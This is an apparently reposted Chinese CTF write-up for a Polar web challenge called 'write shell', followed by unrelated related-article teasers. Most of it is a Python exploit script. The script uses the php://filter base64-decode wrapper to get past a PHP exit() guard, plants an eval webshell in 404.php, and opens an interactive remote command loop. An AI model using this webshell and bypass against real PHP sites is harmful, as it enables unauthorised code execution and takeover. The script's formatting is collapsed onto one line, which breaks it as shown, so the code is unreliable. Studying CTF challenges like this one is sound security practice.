Polar Web【中等】写shell

2024-06-07 21:36
文章标签 中等 web shell polar

本文主要是介绍Polar Web【中等】写shell,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Polar Web【中等】写shell

Contents

  • Polar Web【中等】写shell
    • 思路&探索
    • EXP
    • 运行&总结

思路&探索

初看题目,预测需要对站点写入木马,具体操作需要在过程中逐步实现。

  1. 打开站点(见下图),出现 file_put_contents 函数,其中接收 GET 参数 filename
  2. 同时发现存在半封闭形式的PHP代码 exit() 会导致直接退出程序,其后又连接一个 POST 参数 content,符合死亡绕过的特征,因此考虑使用 php:// 伪协议中的base64解码器来写入木马
  3. 本文采用脚本方式实现木马的绕过、写入以及Webshell的交互逻辑

index

EXP

from requests import post, get
import base64def attack(url, cmd):data = {'cmd': cmd}resp = post(url, data).textif resp:print(resp)else:print("Nothing...")def insert_shell(url):sh = '<?php @eval($_POST["cmd"]);?>'sh = '0' + base64.b64encode(sh.encode()).decode() # base64加密结果前需要引入编码范围内的任意字符,data = {'content': sh,}url_ = url + '?filename=php://filter/convert.base64-decode/resource=404.php' # 文件名自定义_ = post(url=url_, data=data)print(url + '404.php')if get(url + '404.php').content:return 1else:return 0if __name__ == '__main__':u = 'http://~.www.polarctf.com:8090/'if insert_shell(u):print(">> Insert success!\n")u += '404.php'while True:command = input(">> ")if command == 'quit':breakcommand = 'system("' + command + '");'attack(url=u, cmd=command)else:print("Insert Fail..")

运行&总结

测试
run

  • 注意首页PHP代码中半封闭的那部分代码,需要在 base64 编码结果前插入 hex 范围内的任一字符,或者直接采用人为封闭并另起PHP代码块的方式,而本文采用的是前者。
  • 本文也随即演示了 base64 编码在Python中的实现方式。






敬,不完美的明天

这篇关于Polar Web【中等】写shell的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1040361

相关文章

如何使用Maven创建web目录结构

《如何使用Maven创建web目录结构》:本文主要介绍如何使用Maven创建web目录结构的问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录创建web工程第一步第二步第三步第四步第五步第六步第七步总结创建web工程第一步js通过Maven骨架创pytho

Java Web实现类似Excel表格锁定功能实战教程

《JavaWeb实现类似Excel表格锁定功能实战教程》本文将详细介绍通过创建特定div元素并利用CSS布局和JavaScript事件监听来实现类似Excel的锁定行和列效果的方法,感兴趣的朋友跟随... 目录1. 模拟Excel表格锁定功能2. 创建3个div元素实现表格锁定2.1 div元素布局设计2.

如何使用Haporxy搭建Web群集

《如何使用Haporxy搭建Web群集》Haproxy是目前比较流行的一种群集调度工具,同类群集调度工具有很多如LVS和Nginx,本案例介绍使用Haproxy及Nginx搭建一套Web群集,感兴趣的... 目录一、案例分析1.案例概述2.案例前置知识点2.1 HTTP请求2.2 负载均衡常用调度算法 2.

shell中set -u、set -x、set -e的使用

《shell中set-u、set-x、set-e的使用》本文主要介绍了shell中set-u、set-x、set-e的使用,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参... 目录✅ 1. set -u:防止使用未定义变量 作用: 示例:❌ 报错示例输出:✅ 推荐使用场景:✅ 2. se

Linux脚本(shell)的使用方式

《Linux脚本(shell)的使用方式》:本文主要介绍Linux脚本(shell)的使用方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录概述语法详解数学运算表达式Shell变量变量分类环境变量Shell内部变量自定义变量:定义、赋值自定义变量:引用、修改、删

python web 开发之Flask中间件与请求处理钩子的最佳实践

《pythonweb开发之Flask中间件与请求处理钩子的最佳实践》Flask作为轻量级Web框架,提供了灵活的请求处理机制,中间件和请求钩子允许开发者在请求处理的不同阶段插入自定义逻辑,实现诸如... 目录Flask中间件与请求处理钩子完全指南1. 引言2. 请求处理生命周期概述3. 请求钩子详解3.1

SpringBoot项目Web拦截器使用的多种方式

《SpringBoot项目Web拦截器使用的多种方式》在SpringBoot应用中,Web拦截器(Interceptor)是一种用于在请求处理的不同阶段执行自定义逻辑的机制,下面给大家介绍Sprin... 目录一、实现 HandlerInterceptor 接口1、创建HandlerInterceptor实

Web技术与Nginx网站环境部署教程

《Web技术与Nginx网站环境部署教程》:本文主要介绍Web技术与Nginx网站环境部署教程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、Web基础1.域名系统DNS2.Hosts文件3.DNS4.域名注册二.网页与html1.网页概述2.HTML概述3.

Linux实现简易版Shell的代码详解

《Linux实现简易版Shell的代码详解》本篇文章,我们将一起踏上一段有趣的旅程,仿照CentOS–Bash的工作流程,实现一个功能虽然简单,但足以让你深刻理解Shell工作原理的迷你Sh... 目录一、程序流程分析二、代码实现1. 打印命令行提示符2. 获取用户输入的命令行3. 命令行解析4. 执行命令

Python使用Reflex构建现代Web应用的完全指南

《Python使用Reflex构建现代Web应用的完全指南》这篇文章为大家深入介绍了Reflex框架的设计理念,技术特性,项目结构,核心API,实际开发流程以及与其他框架的对比和部署建议,感兴趣的小伙... 目录什么是 ReFlex?为什么选择 Reflex?安装与环境配置构建你的第一个应用核心概念解析组件